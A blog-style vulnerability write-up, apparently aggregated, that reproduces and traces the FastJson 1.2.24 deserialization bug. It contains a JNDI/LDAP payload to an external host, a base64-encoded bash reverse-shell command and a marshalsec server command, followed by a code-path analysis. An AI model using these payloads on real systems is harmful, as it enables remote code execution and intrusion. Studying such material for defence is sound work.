FastJson1.2.24反序列化原理

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://wmqlgxtbil.yutu.eu.org:9999/Exploit", "autoCommit":true}

测试执行

DNS解析记录

利用JNDI工具进行注入

复现流程

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5My4xMzAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.193.130"

这里的-A指向的参数是攻击机的IP地址,即我们的JNDI服务端的IP地址

将上述生代的各协议地址去替换POC中的地址

目标机器开启监听

反弹结果如下

成功进入容器

代码

引入依赖

新建一个恶意类

使用命令 javac Exploit.java生成Exploit.class

对恶意的class文件所在的目录开启一个http服务

利用Java反序列化测试包执行如下命令

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8000/#Exploit 9999

测试fastjson反序列化

public class TestFastJson {public static void main(String[] args) {String payload="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:9999/Exploit\", \"autoCommit\":true}" ;//JSONObject.parseObject(payload);JSON.parse(payload);}
}

代码分析

跟进parseObject方法

进入parse方法

再次进入parse方法

先判空处理

然后进入DefaultJSONParser方法

继续跟

在DefaultJSONParser方法中:主要是用来判断是以是什么方式开始,默认是以’{'开始,并且设置token为12

执行完DefaultJSONParser之后,进入parser.parse()

跟进这里的parse方法

这里根据token为12,然后case跳转至:

进入parseObject方法

这里会通过默认的"{"来获取到第一个参数也就是@type

到这里的时候就回去判断key是不是@type,如果是@type就回去进行检测并且去反序列化类

然后就会到TypeUtils.loadClass

注意在这里会判断开始是不是以'['开头

接着会检查是不是以'L'开头

接着就会删除"L" ,然后继续走loadCLass,会利用类加载器去加载我们指定的类

TypeUtils.loadClass执行结束之后,最后到getDeserializer

然后到deserializer.deserialze反序列化

接着进入之后,主要反序列化的位置在
fastjson\1.2.24\fastjson-1.2.24.jar!\com\alibaba\fastjson\parser\deserializer\JavaBeanDeserializer.class

跟进parseField

然后这里非常重要的就是有一个smartMatch,这个smartMatch会进行一个通用匹配,可以匹配_开始以及-开始的变量:这个对另外一个调用链有用。

进入smartMatch方法之后

可以匹配_开始以及-开始的变量

接着会去调用setValue

从而触发set方法

为field字段设置值,原理就是利用那个类加载器反射创建的类,进行反序列化获取字段,在调用setvalue去设置值

链路如下:parse触发--》parseObject--》TypeUtils.loadClass--》deserialze(类)--》parseField(解析字段)--》smartMeth(设置字段值)

各版本通用的POC参考:FastJson各版本通杀POC · 语雀

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.pswp.cn/bicheng/82081.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于Android的点餐系统_springboot+vue

开发语言:Java框架:springboot AndroidJDK版本:JDK1.8服务器:tomcat7数据库:mysql 5.7数据库工具:Navicat12开发软件:eclipse/myeclipse/ideaMaven包:Maven3.3.9 系统展示 APP登录…

Maven 项目介绍

一、Maven 概述​ Maven 是一个基于 Java 的项目管理和构建自动化工具,由 Apache 软件基金会开发。它采用 “约定优于配置”(Convention Over Configuration)的原则,通过标准化的项目结构和配置,极大地简化了项目的构建…

人工智能+:职业技能培训的元命题与能力重构

当“人工智能”成为各行各业的热门命题时,我们似乎跳过了一个更根本的思考:人类究竟需要怎样的AI能力?这个问题不解决,任何技术赋能都可能沦为无本之木。真正的挑战不在于如何应用AI,而在于如何定义人与AI的能力边界—…

相同,对称,平衡,右视图(二叉树)

本篇基于b站灵茶山艾府。 100. 相同的树 给你两棵二叉树的根节点 p 和 q ,编写一个函数来检验这两棵树是否相同。 如果两个树在结构上相同,并且节点具有相同的值,则认为它们是相同的。 示例 1: 输入:p [1,2,3], q…

MCU开发学习记录19* - CAN学习与实践(HAL库) - 定时传输、触发传输和请求传输(轮询与中断实现) -STM32CubeMX

名词解释: CAN:Controller Area Network ISO:​International Organization for Standardization ​OSI:​Open Systems Interconnection SOF:​Start Of Frame EOF:​End Of Frame​​ 统一文章结构&…

LEED认证是什么?LEED认证难吗?LEED认证需要准备的资料

LEED(Leadership in Energy and Environmental Design,能源与环境设计先锋)是由美国绿色建筑委员会(USGBC)开发的一套全球广泛认可的绿色建筑认证体系,用于评估建筑在设计、施工、运营和维护中的可持续性表…

【ffmpeg】ffprobe基本用法

ffprobe 是 FFmpeg 工具集中的一个强大命令行工具,主要用于分析多媒体文件(如视频、音频等)的格式和内容信息。它可以提取文件的元数据、编解码器信息、流详情、帧信息等,而无需对文件进行转码或修改。 基本用法 ffprobe [选项] …

暗黑科技感风格智慧工地监管系统

智慧工地监管系统作为这场变革中的关键力量,正逐渐改变着传统工地的管理模式。今天,就带大家一同领略一款用Axure精心打造的暗黑科技感风格智慧工地监管系统原型,感受科技与建筑碰撞出的奇妙火花。 这款智慧工地监管系统原型采用了极具魅力的…

【软件安装】Windows操作系统中安装mongodb数据库和mongo-shell工具

这篇文章,主要介绍Windows操作系统中如何安装mongodb数据库和mongo-shell工具。 目录 一、安装mongodb数据库 1.1、下载mongodb安装包 1.2、添加配置文件 1.3、编写启动脚本(可选) 1.4、启动服务 二、安装mongo-shell工具 2.1、下载mo…

CSS:margin的塌陷与合并问题

文章目录 一、margin塌陷问题二、margin合并问题 一、margin塌陷问题 二、margin合并问题

PostgreSQL 数据库备份与恢复

1 逻辑备份(单库) postgres#pg_dump --help 使用方法: pg_dump [选项]... [数据库名字] 一般选项: -f, --fileFILENAME 输出文件或目录名 -F, --formatc|d|t|p 输出文件格式 (c 自定义压缩格式输出, d 目录, tar,p 备份为文本明…

使用 LibreOffice 实现各种文档格式转换(支持任何开发语言调用 和 Linux + Windows 环境)[全网首发,保姆级教程,建议收藏]

以下能帮助你可以使用任何开发语言,在任何平台都能使用 LibreOffice 实现 Word、Excel、PPT 等文档的自动转换,目前展示在 ASP.NET Core 中为 PDF的实战案例,其他的文档格式转换逻辑同理。 📦 1. 安装 LibreOffice 🐧…

AWS stop/start 使实例存储lost + 注意点

先看一下官方的说明: EC2有一个特性,当执行stop/start操作(注意,这个并不是重启/reboot,而是先停止/stop,再启动/start)时,该EC2会迁移到其它的底层硬件上。 对于实例存储来说,由于实例存储是由其所在的底层硬件来提供的,此时相当于分配到了一块全新的空的磁盘。 但是从…

跨域问题详解

目录 一、什么是跨域问题? 二、跨域问题出现的原因 三、跨域的解决方案 四、结语 在 Web 开发的世界里,当我们尝试通过 AJAX 等技术获取不同源的资源时,常常会遇到 “跨域问题”。这不仅是前端开发者频繁遭遇的技术障碍,也是保…

VSCode 插件 GitLens 破解方法

文章目录 1. 安装指定版本2. 修改插件文件3. 重启 VSCode 1. 安装指定版本 在 VSCode 中打开扩展(Ctrl Shift X),搜索 GitLens,右键点击 安装特定版本,在弹出的窗口中选择 17.0.2,然后等待安装完成。 2…

JavaScript的三大核心组成:ECMAScript、DOM与BOM

JavaScript的三大核心组成:ECMAScript、DOM与BOM 在前端开发领域,JavaScript是构建动态网页和交互式应用的核心语言。然而,许多人对JavaScript的组成缺乏清晰的认识。实际上,JavaScript并非单一的语言规范,而是由三个…

JC/T 2490-2019 石灰基单层装饰砂浆检测

石灰基单层装饰砂浆是指由石灰等无机胶凝材料、级配砂、外加剂或无机颜料制成的具有装饰功能的干粉饰面材料。 JC/T 2490-2019石灰基单层装饰砂浆检测项目: 测试项目 测试方法 外观 JC/T 2490 干密度 JC/T 2490 凝结时间 JGJ/T 70 抗折强度 GB/T 17671 抗…

用算法实现 用统计的方式实现 用自然语言处理的方法实现 用大模型实现 专利精益化统计分析

我们可以从算法、统计、自然语言处理(NLP)和大型语言模型(LLM)这四个方面,探讨如何实现对专利社区、作者重要性以及共同作者贡献度的分析。 1. 如何体现专利的社区 (社群效应) 🤖 用算法实现 网络分析算法…

深入浅出IIC协议 - 从总线原理到FPGA实战开发 -- 第五篇:多主仲裁与错误恢复

第五篇:多主仲裁与错误恢复 副标题 :从总线冲突到故障自愈——构建高可靠I2C系统的终极指南 1. 多主仲裁机制 1.1 仲裁原理与硬件实现 仲裁流程图解 : 仲裁失败处理 : 立即切换为从机模式 监测总线空闲后重试(随机…

146. LRU Cache

题目描述 146. LRU Cache 哈希表双向链表 详见代码和注释: class LRUCache { private:int capacity_{0};int size_{0};struct Node{int key{0};int val{0};Node* pre{nullptr};Node* next{nullptr};Node(int k,int v,Node* pr,Node* nex):key(k),val(v),pre(pr),…